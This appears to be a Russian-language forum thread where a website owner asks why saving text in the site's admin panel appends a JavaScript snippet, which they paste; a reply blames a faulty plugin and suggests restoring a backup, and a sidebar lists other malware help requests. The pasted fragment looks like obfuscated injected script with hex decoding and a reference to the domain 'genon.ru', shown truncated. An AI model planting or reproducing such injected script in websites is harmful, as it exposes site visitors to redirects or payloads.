Перейти к содержанию

Что это? Как избавиться?

guasha

Рекомендуемые сообщения

Добрый день, друзья!

Что это?

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "genon.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

В админке сайта пишу текст, кликаю по кнопке "Сохранить", после текста появляется вот этот код и текст сохраняется с ним. Удалить, вырезать можно, но как только снова нажимаю Сохранить, появляется снова. Т.е. опубликовать текст можно только с этим кодом.

Помогите избавиться! Работа стала!

Здравствуйте! Похоже, что какое-то дополнение/мод для движка сайта  глючат. Сайт у вас на каком движке? Пробуйте восстановить из копии как написали выше.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в

Войти
  • Похожий контент

• ggwlzxz
      От ggwlzxz
      И так недавно подхватил оказывается сложный криптомайнер «taskhostw». На свой компьютер,  честно не знаю как избавиться от него. Качал аваст и дрвеб ничего не нашла ни одна прога. Могу пойти в дс. 
      И да вирус показался мне 1 раз когда только загружал диспетчер задач.

• kokonai
      От kokonai
      Вирус trojan.win32.sepeh.gen, появилась из-за пиратской программы активации kms офис виндоус, после цп загружается, перезагрузка ноутбука раз в 20-30 секунд при подключение к сети
      Прошу помочь, хотелось бы обходиться без прошивки системы😬
    • grafbender
      От grafbender
      Доброго времени суток. Мой пк тормозит уже продолжительное время. Какого-либо внимания я этому не уделял, так как пользуюсь им редко. Однако, пару дней назад я совершая пробную операцию по покупке крипты, скопировал номер своего кошелька и направил на него деньги. Как оказалось каким то неведомым образом номер кошелька менялся прямо при копировании. Тут я и начал что то подозревать. Просканировав пк утилитой от Dr.Web, мне выдало целый список вирусов среди которых были трояны и btcmine. Только после удаления всех этих файлов, я решился посмотреть в интернете как с этим бороться, и понял что не все так просто. При повторном сканировании как Dr.Web так и Касперским более никаких вирусов не обнаруживается, однако полной уверенности от избавления у меня нету. Подсобите пожалуйста, какие шаги мне необходимо проделать  еще
      P.S. Нельзя назвать меня осторожным пользователем пользователем интернета, поэтому пиратского контента употребляется и употреблялось очень много, то есть торренты в моей жизни присутствуют.
      AV_block_remove_2024.03.12-20.03.log
    • димассс
    • Мурад Абдуллаев
      От Мурад Абдуллаев
      Здравствуйте , недавно появился вирус Worm.NSIS.BitMin.d вот такого рода, никак не могу избавиться , по всей сети бегает, нашел источник, касперский 12.3 не помогает, нет ли способа удалить раз и насвегда?
  • Создать...